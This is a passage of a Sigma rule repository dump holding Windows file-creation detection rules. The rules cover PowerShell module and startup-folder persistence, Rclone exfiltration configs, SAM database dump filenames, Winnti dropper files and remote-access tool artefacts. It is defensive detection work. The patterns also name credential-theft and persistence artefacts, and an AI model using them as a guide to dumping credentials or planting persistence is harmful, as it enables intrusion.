    "content": "title: PowerShell Module File Created\nid: e36941d0-c0f0-443f-bc6f-cb2952eb69ea\nstatus: test\ndescription: Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc.\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|contains:\n            - '\\WindowsPowerShell\\Modules\\'\n            - '\\PowerShell\\7\\Modules\\'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml",
    "content": "title: Potential Suspicious PowerShell Module File Created\nid: e8a52bbd-bced-459f-bd93-64db45ce7657\nstatus: test\ndescription: Detects the creation of a new PowerShell module in the first folder of the module directory structure \"\\WindowsPowerShell\\Modules\\malware\\malware.psm1\". This is somewhat an uncommon practice as legitimate modules often includes a version folder.\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            # Note: Don't include PowerShell 7 as it has default modules that don't follow this logic\n            - '\\\\WindowsPowerShell\\\\Modules\\\\*\\.ps'\n            - '\\\\WindowsPowerShell\\\\Modules\\\\*\\.dll'\n    condition: selection\nfalsepositives:\n    - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml",
    "content": "title: PowerShell Module File Created By Non-PowerShell Process\nid: e3845023-ca9a-4024-b2b2-5422156d5527\nstatus: test\ndescription: Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc. by a non-PowerShell process\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\nmodified: 2025-10-07\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\WindowsPowerShell\\Modules\\'\n            - '\\PowerShell\\7\\Modules\\'\n    filter_main_pwsh:\n        Image|endswith:\n            - ':\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - ':\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - ':\\Windows\\System32\\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448\n            - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - ':\\Windows\\SysWOW64\\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448\n            - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml",
    "content": "title: Potential Startup Shortcut Persistence Via PowerShell.EXE\nid: 92fa78e7-4d39-45f1-91a3-8b23f3f1088d\nstatus: test\ndescription: |\n    Detects PowerShell writing startup shortcuts.\n    This procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\n    Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\n    In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\n    - https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder\nauthor: Christopher Peacock '@securepeacock', SCYTHE\ndate: 2021-10-24\nmodified: 2023-02-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        TargetFilename|contains: '\\start menu\\programs\\startup\\'\n        TargetFilename|endswith: '.lnk'\n    condition: selection\nfalsepositives:\n    - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml",
    "content": "title: PSScriptPolicyTest Creation By Uncommon Process\nid: 1027d292-dd87-4a1a-8701-2abe04d7783c\nstatus: test\ndescription: Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.\nreferences:\n    - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-01\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '__PSScriptPolicyTest_'\n    filter_main_powershell:\n        Image:\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_main_pwsh_preview:\n        Image|contains:\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview'\n        Image|endswith: '\\pwsh.exe'\n    filter_main_generic:\n        Image:\n            - 'C:\\Windows\\System32\\dsac.exe'\n            - 'C:\\Windows\\System32\\sdiagnhost.exe'\n            - 'C:\\Windows\\System32\\ServerManager.exe'\n            - 'C:\\Windows\\System32\\wsmprovhost.exe'\n            - 'C:\\Windows\\SysWOW64\\sdiagnhost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_rclone_config_files.yml",
    "content": "title: Rclone Config File Creation\nid: 34986307-b7f4-49be-92f3-e7a4d01ac5db\nstatus: test\ndescription: Detects Rclone config files being created\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nauthor: Aaron Greetham (@beardofbinary) - NCC Group\ndate: 2021-05-26\nmodified: 2023-05-09\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\.config\\rclone\\'\n    condition: selection\nfalsepositives:\n    - Legitimate Rclone usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml",
    "content": "title: .RDP File Created By Uncommon Application\nid: fccfb43e-09a7-4bd2-8b37-a5a7df33386d\nrelated:\n    - id: f748c45a-f8d3-4e6f-b617-fe176f695b8f\n      type: derived\nstatus: test\ndescription: |\n    Detects creation of a file with an \".rdp\" extension by an application that doesn't commonly create such files.\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\nmodified: 2024-11-01\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.rdp'\n        Image|endswith:\n            # Covers browsers\n            - '\\brave.exe'\n            - '\\CCleaner Browser\\Application\\CCleanerBrowser.exe'\n            - '\\chromium.exe'\n            - '\\firefox.exe'\n            - '\\Google\\Chrome\\Application\\chrome.exe'\n            - '\\iexplore.exe'\n            - '\\microsoftedge.exe'\n            - '\\msedge.exe'\n            - '\\Opera.exe'\n            - '\\Vivaldi.exe'\n            - '\\Whale.exe'\n            # Covers email clients\n            - '\\olk.exe' # Outlook\n            - '\\Outlook.exe'\n            - '\\RuntimeBroker.exe' # If the windows mail client is used\n            - '\\Thunderbird.exe'\n            # Covers chat applications\n            - '\\Discord.exe' # Should open the browser for download, but just in case.\n            - '\\Keybase.exe'\n            - '\\msteams.exe'\n            - '\\Slack.exe'\n            - '\\teams.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml",
    "content": "title: Potential Winnti Dropper Activity\nid: 130c9e58-28ac-4f83-8574-0a4cc913b97e\nstatus: test\ndescription: Detects files dropped by Winnti as described in RedMimicry Winnti playbook\nreferences:\n    - https://redmimicry.com/posts/redmimicry-winnti/#dropper\nauthor: Alexander Rausch\ndate: 2020-06-24\nmodified: 2023-01-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\gthread-3.6.dll'\n            - '\\sigcmm-2.4.dll'\n            - '\\Windows\\Temp\\tmp.bat'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_regedit_print_as_pdf.yml",
    "content": "title: PDF File Created By RegEdit.EXE\nid: 145095eb-e273-443b-83d0-f9b519b7867b\nstatus: test\ndescription: |\n    Detects the creation of a file with the \".pdf\" extension by the \"RegEdit.exe\" process.\n    This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.\nreferences:\n    - https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-08\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regedit.exe'\n        TargetFilename|endswith: '.pdf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_remcom_service.yml",
    "content": "title: RemCom Service File Creation\nid: 7eff1a7f-dd45-4c20-877a-f21e342a7611\nstatus: test\ndescription: Detects default RemCom service filename which indicates RemCom service installation and execution\nreferences:\n    - https://github.com/kavika13/RemCom/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-04\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\RemComSvc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml",
    "content": "title: ScreenConnect Temporary Installation Artefact\nid: fec96f39-988b-4586-b746-b93d59fd1922\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows\nauthor: frack113\ndate: 2022-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\Bin\\ScreenConnect.' # pattern to dll and jar file\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml",
    "content": "title: Remote Access Tool - ScreenConnect Temporary File\nid: 0afecb6e-6223-4a82-99fb-bf5b981e92a5\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of files in a specific location by ScreenConnect RMM.\n    ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to \":\\Users\\<username>\\Documents\\ConnectWiseControl\\Temp\\\" before execution.\nreferences:\n    - https://github.com/SigmaHQ/sigma/pull/4467\nauthor: Ali Alwashali\ndate: 2023-10-10\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ScreenConnect.WindowsClient.exe'\n        TargetFilename|contains: '\\Documents\\ConnectWiseControl\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ScreenConnect\n# Note: Incase the level if ScreenConnect is not used\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ripzip_attack.yml",
    "content": "title: Potential RipZip Attack on Startup Folder\nid: a6976974-ea6f-4e97-818e-ea08625c52cb\nstatus: test\ndescription: |\n    Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\n    If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\n    Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\nreferences:\n    - https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19\nauthor: Greg (rule)\ndate: 2022-07-21\nmodified: 2023-01-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection: # %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\\target.lnk\n        TargetFilename|contains|all:\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup'\n            - '.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}'\n        Image|endswith: '\\explorer.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sam_dump.yml",
    "content": "title: Potential SAM Database Dump\nid: 4e87b8e2-2ee9-4b2a-a715-4727d297ece0\nstatus: test\ndescription: Detects the creation of files that look like exports of the local SAM (Security Account Manager)\nreferences:\n    - https://github.com/search?q=CVE-2021-36934\n    - https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934\n    - https://www.google.com/search?q=%22reg.exe+save%22+sam\n    - https://github.com/HuskyHacks/ShadowSteal\n    - https://github.com/FireFart/hivenightmare\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-11\nmodified: 2023-01-05\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        - TargetFilename|endswith:\n              - '\\Temp\\sam'\n              - '\\sam.sav'\n              - '\\Intel\\sam'\n              - '\\sam.hive'\n              - '\\Perflogs\\sam'\n              - '\\ProgramData\\sam'\n              - '\\Users\\Public\\sam'\n              - '\\AppData\\Local\\sam'\n              - '\\AppData\\Roaming\\sam'\n              - '_ShadowSteal.zip'       # https://github.com/HuskyHacks/ShadowSteal\n              - '\\Documents\\SAM.export'  # https://github.com/n3tsurge/CVE-2021-36934/\n              - ':\\sam'\n        - TargetFilename|contains:\n              - '\\hive_sam_'             # https://github.com/FireFart/hivenightmare\n              - '\\sam.save'\n              - '\\sam.export'\n              - '\\~reg_sam.save'\n              - '\\sam_backup'\n              - '\\sam.bck'\n              - '\\sam.backup'\n    condition: selection\nfalsepositives:\n    - Rare cases of administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sed_file_creation.yml",
    "content": "title: Self Extraction Directive File Created In Potentially Suspicious Location\nid: 760e75d8-c3b5-409b-a9bf-6130b4c4603f\nrelated:\n    - id: ab90dab8-c7da-4010-9193-563528cfa347\n      type: derived\nstatus: test\ndescription: |\n    Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.\n    These files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\n    Attackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith: '.sed'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml",
    "content": "title: Windows Shell/Scripting Application File Write to Suspicious Folder\nid: 1277f594-a7d1-4f28-a2d3-73af5cbeab43\nstatus: test\ndescription: Detects Windows shells and scripting applications that write files to suspicious folders\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-20\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_1:\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\msbuild.exe'  # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\sh.exe'\n            - '\\wscript.exe'\n        TargetFilename|startswith:\n            - 'C:\\PerfLogs\\'\n            - 'C:\\Users\\Public\\'\n    selection_2:\n        Image|endswith:\n            - '\\certutil.exe'\n            - '\\forfiles.exe'\n            - '\\mshta.exe'\n            # - '\\rundll32.exe' # Potential FP\n            - '\\schtasks.exe'\n            - '\\scriptrunner.exe'\n            - '\\wmic.exe'  # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n        TargetFilename|contains:\n            - 'C:\\PerfLogs\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Temp\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml",
    "content": "title: Windows Binaries Write Suspicious Extensions\nid: b8fd0e93-ff58-4cbd-8f48-1c114e342e62\nrelated:\n    - id: 1277f594-a7d1-4f28-a2d3-73af5cbeab43\n      type: derived\nstatus: test\ndescription: Detects Windows executables that write files with suspicious extensions\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        Image|endswith:\n            - '\\csrss.exe'\n            - '\\lsass.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\sihost.exe'\n            - '\\smss.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.iso'\n            - '.ps1'\n            - '.txt'\n            - '.vbe'\n            - '.vbs'\n    selection_special:\n        Image|endswith:\n            - '\\dllhost.exe'\n            - '\\rundll32.exe'\n            - '\\svchost.exe'\n        TargetFilename|endswith:\n            - '.bat'\n            - '.hta'\n            - '.iso'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n    filter_main_AppLockerPolicyTest:\n        Image: 'C:\\Windows\\System32\\dllhost.exe'\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\__PSScriptPolicyTest_'\n        TargetFilename|endswith: '.ps1'\n    filter_main_script_gpo_machine:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n        TargetFilename|contains|all:\n            - 'C:\\Windows\\System32\\GroupPolicy\\DataStore\\'\n            - '\\sysvol\\'\n            - '\\Policies\\'\n            - '\\Machine\\Scripts\\Startup\\'\n        TargetFilename|endswith:\n            - '.ps1'\n            - '.bat'\n    
filter_main_clipchamp:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n        TargetFilename|contains|all:\n            - 'C:\\Program Files\\WindowsApps\\Clipchamp'\n            - '.ps1'\n    filter_main_powershell_preview:\n        Image:\n            - 'C:\\Windows\\system32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - 'C:\\Program Files (x86)\\WindowsApps\\Microsoft.PowerShellPreview'\n        TargetFilename|endswith: '.ps1'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml",
    "content": "title: Startup Folder File Write\nid: 2aa0a6b4-a865-495b-ab51-c28249537b75\nrelated:\n    - id: 28208707-fe31-437f-9a7f-4b1108b94d2e\n      type: similar\nstatus: test\ndescription: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/12\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2025-12-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp'\n    filter_main_update:\n        - Image:\n              - 'C:\\Windows\\System32\\wuauclt.exe'\n              - 'C:\\Windows\\uus\\ARM64\\wuaucltcore.exe'\n        - TargetFilename|startswith:\n              - 'C:\\$WINDOWS.~BT\\NewOS\\'\n              - 'C:\\$WinREAgent\\Scratch\\Mount\\'\n    filter_optional_onenote:\n        Image|endswith: '\\ONENOTE.EXE'\n        TargetFilename|endswith: '\\Send to OneNote.lnk'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_colorcpl.yml",
    "content": "title: Suspicious Creation with Colorcpl\nid: e15b518d-b4ce-4410-a9cd-501f23ce4a18\nstatus: test\ndescription: Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\\nreferences:\n    - https://twitter.com/eral4m/status/1480468728324231172?s=20\nauthor: frack113\ndate: 2022-01-21\nmodified: 2023-01-05\ntags:\n    - attack.defense-evasion\n    - attack.t1564\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\colorcpl.exe'\n    filter_ext:\n        TargetFilename|endswith:\n            - '.icm'\n            - '.gmmp'\n            - '.cdmp'\n            - '.camp'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml",
    "content": "title: Created Files by Microsoft Sync Center\nid: 409f8a98-4496-4aaa-818a-c931c0a8b832\nstatus: test\ndescription: This rule detects suspicious files created by Microsoft Sync Center (mobsync)\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim\ndate: 2022-04-28\nmodified: 2022-06-02\ntags:\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.t1218\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_mobsync:\n        Image|endswith: '\\mobsync.exe'\n    filter_created_file:\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    condition: selection_mobsync and filter_created_file\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml",
    "content": "title: Suspicious Files in Default GPO Folder\nid: 5f87308a-0a5b-4623-ae15-d8fa1809bc60\nstatus: test\ndescription: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim\ndate: 2022-04-28\ntags:\n    - attack.t1036.005\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml",
    "content": "title: Suspicious Creation TXT File in User Desktop\nid: caf02a0a-1e1c-4552-9b48-5e070bd88d11\nstatus: test\ndescription: Ransomware create txt file in the user Desktop\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note\nauthor: frack113\ndate: 2021-12-26\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\cmd.exe'\n        TargetFilename|contains|all:\n            - '\\Users\\'\n            - '\\Desktop\\'\n        TargetFilename|endswith: '.txt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml",
    "content": "title: Suspicious Desktopimgdownldr Target File\nid: fc4f4817-0c53-4683-a4ee-b17a64bc1039\nstatus: test\ndescription: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension\nreferences:\n    - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n    - https://twitter.com/SBousseaden/status/1278977301745741825\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-03\nmodified: 2022-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        TargetFilename|contains: '\\Personalization\\LockScreenImage\\'\n    filter1:\n        TargetFilename|contains: 'C:\\Windows\\'\n    filter2:\n        TargetFilename|contains:\n            - '.jpg'\n            - '.jpeg'\n            - '.png'\n    condition: selection and not filter1 and not filter2\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_diagcab.yml",
    "content": "title: Creation of a Diagcab\nid: 3d0ed417-3d94-4963-a562-4a92c940656a\nstatus: test\ndescription: Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)\nreferences:\n    - https://threadreaderapp.com/thread/1533879688141086720.html\nauthor: frack113\ndate: 2022-06-08\ntags:\n    - attack.resource-development\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.diagcab'\n    condition: selection\nfalsepositives:\n    - Legitimate microsoft diagcab\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_double_extension.yml",
